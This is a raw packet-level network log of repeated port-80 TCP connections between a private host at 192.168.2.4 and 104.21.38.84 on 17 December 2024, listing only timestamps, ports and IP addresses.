Dec 17, 2024 00:08:06.267966032 CET	80	49769	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:06.879050016 CET	80	49769	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:06.929307938 CET	49769	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:07.124248028 CET	80	49769	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:07.179178953 CET	49769	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:07.236664057 CET	49769	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:07.237562895 CET	49772	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:07.356960058 CET	80	49769	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:07.357031107 CET	49769	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:07.357522011 CET	80	49772	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:07.357593060 CET	49772	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:07.357893944 CET	49772	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:07.477606058 CET	80	49772	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:07.710887909 CET	49772	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:07.831038952 CET	80	49772	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:08.444134951 CET	80	49772	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:08.491815090 CET	49772	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:08.694015026 CET	80	49772	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:08.741699934 CET	49772	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:08.885879040 CET	80	49772	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:08.929210901 CET	49772	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:09.003925085 CET	49778	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:09.124007940 CET	80	49778	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:09.125583887 CET	49778	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:09.125776052 CET	49778	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:09.245543957 CET	80	49778	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:09.476214886 CET	49778	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:09.596041918 CET	80	49778	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:10.212064028 CET	80	49778	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:10.257368088 CET	49778	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:10.400336981 CET	49778	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:10.400907040 CET	49784	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:10.464339018 CET	80	49778	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:10.464487076 CET	49778	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:10.520772934 CET	80	49778	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:10.520812035 CET	80	49784	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:10.520900965 CET	49778	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:10.520953894 CET	49784	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:10.521091938 CET	49784	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:10.521457911 CET	49785	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:10.640852928 CET	80	49784	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:10.641283035 CET	80	49785	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:10.641382933 CET	49785	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:10.641555071 CET	49785	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:10.761511087 CET	80	49785	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:10.868236065 CET	49784	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:10.988480091 CET	80	49784	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:10.988517046 CET	80	49784	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:10.991776943 CET	49785	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:11.111975908 CET	80	49785	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:11.606230974 CET	80	49784	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:11.663599968 CET	49784	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:11.728331089 CET	80	49785	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:11.772944927 CET	49785	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:11.878938913 CET	80	49784	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:11.929225922 CET	49784	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:11.981856108 CET	80	49785	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:12.022979021 CET	49785	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:12.096251965 CET	49785	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:12.096364021 CET	49784	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:12.097021103 CET	49790	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:12.216378927 CET	80	49785	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:12.216443062 CET	49785	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:12.216824055 CET	80	49790	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:12.216929913 CET	80	49784	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:12.217024088 CET	49784	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:12.217056036 CET	49790	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:12.217202902 CET	49790	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:12.337059021 CET	80	49790	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:12.570029974 CET	49790	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:12.690062046 CET	80	49790	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:13.302424908 CET	80	49790	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:13.351196051 CET	49790	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:13.560295105 CET	80	49790	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:13.601125956 CET	49790	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:13.691215038 CET	49792	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:13.810971975 CET	80	49792	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:13.811350107 CET	49792	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:13.811351061 CET	49792	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:13.931576967 CET	80	49792	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:14.163664103 CET	49792	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:14.283524036 CET	80	49792	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:14.898664951 CET	80	49792	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:14.944879055 CET	49792	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:15.159926891 CET	80	49792	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:15.210515022 CET	49792	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:15.294099092 CET	49790	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:15.295217991 CET	49792	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:15.295979977 CET	49798	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:15.415306091 CET	80	49792	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:15.415420055 CET	49792	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:15.415744066 CET	80	49798	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:15.415836096 CET	49798	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:15.416008949 CET	49798	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:15.535706997 CET	80	49798	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:15.773102999 CET	49798	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:15.893189907 CET	80	49798	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:16.514914036 CET	80	49798	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:16.569833040 CET	49798	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:16.763830900 CET	80	49798	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:16.804224968 CET	49798	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:16.878046989 CET	49798	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:16.878639936 CET	49804	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:16.883384943 CET	49805	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:16.998209000 CET	80	49798	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:16.998261929 CET	49798	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:16.998358011 CET	80	49804	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:16.998451948 CET	49804	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:16.998626947 CET	49804	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:17.003290892 CET	80	49805	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:17.003396988 CET	49805	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:17.003487110 CET	49805	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:17.118628025 CET	80	49804	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:17.123744011 CET	80	49805	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:17.351353884 CET	49804	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:17.351443052 CET	49805	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:17.471344948 CET	80	49804	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:17.471407890 CET	80	49805	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:17.471559048 CET	80	49805	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:18.085788012 CET	80	49804	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:18.088913918 CET	80	49805	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:18.132348061 CET	49804	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:18.132566929 CET	49805	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:18.321352005 CET	80	49804	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:18.322024107 CET	49805	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:18.366717100 CET	49804	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:18.384047985 CET	80	49805	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:18.384118080 CET	49805	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:18.442168951 CET	80	49805	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:18.442238092 CET	49805	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:18.459942102 CET	49804	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:18.460254908 CET	49809	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:18.580185890 CET	80	49804	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:18.580229044 CET	80	49809	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:18.580298901 CET	49804	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:18.580462933 CET	49809	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:18.580462933 CET	49809	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:18.700345993 CET	80	49809	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:18.929481030 CET	49809	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:19.049829006 CET	80	49809	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:19.665416956 CET	80	49809	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:19.710565090 CET	49809	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:19.918865919 CET	80	49809	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:19.960462093 CET	49809	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:20.111166000 CET	80	49809	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:20.163635015 CET	49809	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:20.240201950 CET	49812	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:20.360100031 CET	80	49812	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:20.360328913 CET	49812	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:20.360421896 CET	49812	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:20.480256081 CET	80	49812	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:20.755136013 CET	49812	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:20.875119925 CET	80	49812	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:21.445103884 CET	80	49812	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:21.491743088 CET	49812	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:21.683435917 CET	80	49812	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:21.726212978 CET	49812	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:21.796329975 CET	49809	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:21.800915003 CET	49812	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:21.801652908 CET	49818	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:21.921631098 CET	80	49812	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:21.921669006 CET	80	49818	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:21.921751022 CET	49818	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:21.921804905 CET	49812	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:21.921912909 CET	49818	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:22.041763067 CET	80	49818	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:22.273111105 CET	49818	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:22.393208981 CET	80	49818	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:23.029273033 CET	80	49818	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:23.069852114 CET	49818	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:23.270961046 CET	80	49818	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:23.319858074 CET	49818	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:23.337131977 CET	49824	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:23.397572994 CET	49825	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:23.457216024 CET	80	49824	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:23.457284927 CET	49824	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:23.517723083 CET	80	49825	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:23.517819881 CET	49825	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:23.517972946 CET	49825	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:23.637792110 CET	80	49825	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:23.866837978 CET	49825	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:23.987061977 CET	80	49825	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:24.603388071 CET	80	49825	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:24.648092985 CET	49825	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:24.845994949 CET	80	49825	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:24.897990942 CET	49825	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:24.972430944 CET	49825	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:24.973050117 CET	49826	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:25.092431068 CET	80	49825	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:25.092492104 CET	49825	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:25.092853069 CET	80	49826	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:25.094192982 CET	49826	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:25.094257116 CET	49826	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:25.213946104 CET	80	49826	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:25.445064068 CET	49826	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:25.565030098 CET	80	49826	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:26.179301977 CET	80	49826	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:26.226125956 CET	49826	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:26.413232088 CET	80	49826	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:26.460521936 CET	49826	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:26.533554077 CET	49818	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:26.535063028 CET	49826	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:26.535845041 CET	49832	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:26.655020952 CET	80	49826	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:26.655087948 CET	49826	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:26.655606985 CET	80	49832	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:26.655678034 CET	49832	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:26.655795097 CET	49832	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:26.775500059 CET	80	49832	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:27.007528067 CET	49832	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:27.175045013 CET	80	49832	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:27.785723925 CET	80	49832	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:27.835484982 CET	49832	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:28.025120974 CET	80	49832	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:28.069864988 CET	49832	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:28.148242950 CET	49838	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:28.268800020 CET	80	49838	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:28.268923044 CET	49838	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:28.269031048 CET	49838	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:28.389128923 CET	80	49838	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:28.415050983 CET	49838	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:28.416640997 CET	49839	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:28.536622047 CET	80	49839	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:28.536844969 CET	49839	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:28.537292004 CET	49839	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:28.537302971 CET	49840	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:28.577281952 CET	80	49838	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:28.657124043 CET	80	49839	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:28.657295942 CET	80	49840	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:28.657490015 CET	49840	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:28.657572985 CET	49840	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:28.777398109 CET	80	49840	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:28.882961035 CET	49839	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:29.002758026 CET	80	49839	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:29.003024101 CET	80	49839	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:29.007654905 CET	49840	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:29.127588034 CET	80	49840	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:29.161073923 CET	80	49838	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:29.161422014 CET	49838	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:29.622641087 CET	80	49839	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:29.663606882 CET	49839	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:29.758251905 CET	80	49840	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:29.804347992 CET	49840	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:29.904422998 CET	80	49839	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:29.944958925 CET	49839	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:30.019820929 CET	80	49840	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:30.069881916 CET	49840	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:30.144110918 CET	49832	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:30.144146919 CET	49839	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:30.144234896 CET	49840	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:30.144823074 CET	49846	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:30.264925957 CET	80	49846	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:30.265022993 CET	49846	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:30.265206099 CET	49846	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:30.265423059 CET	80	49839	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:30.265475035 CET	49839	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:30.265479088 CET	80	49840	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:30.265547037 CET	49840	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:30.385221958 CET	80	49846	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:30.616811037 CET	49846	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:30.737268925 CET	80	49846	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:31.350894928 CET	80	49846	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:31.397989035 CET	49846	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:31.600007057 CET	80	49846	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:31.648185968 CET	49846	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:31.724432945 CET	49849	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:31.844125986 CET	80	49849	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:31.844306946 CET	49849	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:31.844472885 CET	49849	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:31.964351892 CET	80	49849	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:32.194981098 CET	49849	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:32.314965963 CET	80	49849	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:32.929598093 CET	80	49849	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:32.976164103 CET	49849	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:33.190766096 CET	80	49849	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:33.241764069 CET	49849	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:33.317636013 CET	49849	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:33.318125010 CET	49853	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:33.438433886 CET	80	49853	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:33.438657045 CET	49853	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:33.438724041 CET	80	49849	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:33.438738108 CET	49853	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:33.438792944 CET	49849	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:33.559240103 CET	80	49853	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:33.788748026 CET	49853	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:33.908739090 CET	80	49853	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:34.526000977 CET	80	49853	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:34.569940090 CET	49853	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:34.782382011 CET	80	49853	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:34.835529089 CET	49853	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:34.909281969 CET	49853	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:34.909941912 CET	49859	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:34.914602995 CET	49860	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:35.029892921 CET	80	49853	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:35.029916048 CET	80	49859	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:35.030010939 CET	49853	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:35.030050039 CET	49859	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:35.030173063 CET	49859	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:35.034557104 CET	80	49860	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:35.035167933 CET	49860	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:35.035379887 CET	49860	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:35.150051117 CET	80	49859	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:35.155283928 CET	80	49860	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:35.382519960 CET	49860	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:35.382685900 CET	49859	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:35.502727032 CET	80	49860	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:35.502748013 CET	80	49860	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:35.502760887 CET	80	49859	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:36.123096943 CET	80	49859	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:36.124504089 CET	80	49860	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:36.179248095 CET	49859	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:36.179270029 CET	49860	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:36.373620987 CET	80	49860	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:36.375272036 CET	49859	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:36.381699085 CET	80	49859	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:36.381752014 CET	49859	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:36.413644075 CET	49860	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:36.489320993 CET	49846	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:36.493320942 CET	49860	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:36.494076967 CET	49866	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:36.496927023 CET	80	49859	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:36.497004986 CET	49859	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:36.613567114 CET	80	49860	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:36.613646984 CET	49860	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:36.613828897 CET	80	49866	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:36.613907099 CET	49866	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:36.614048958 CET	49866	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:36.734021902 CET	80	49866	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:36.960706949 CET	49866	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:37.081152916 CET	80	49866	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:37.700295925 CET	80	49866	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:37.744127989 CET	49866	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:37.956676006 CET	80	49866	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:38.007565022 CET	49866	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:38.081456900 CET	49866	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:38.082112074 CET	49867	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:38.202112913 CET	80	49866	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:38.202169895 CET	80	49867	104.21.38.84	192.168.2.4
Dec 17, 2024 00:08:38.202353001 CET	49867	80	192.168.2.4	104.21.38.84
Dec 17, 2024 00:08:38.202390909 CET	49866	80	192.168.2.4	104.21.38.84
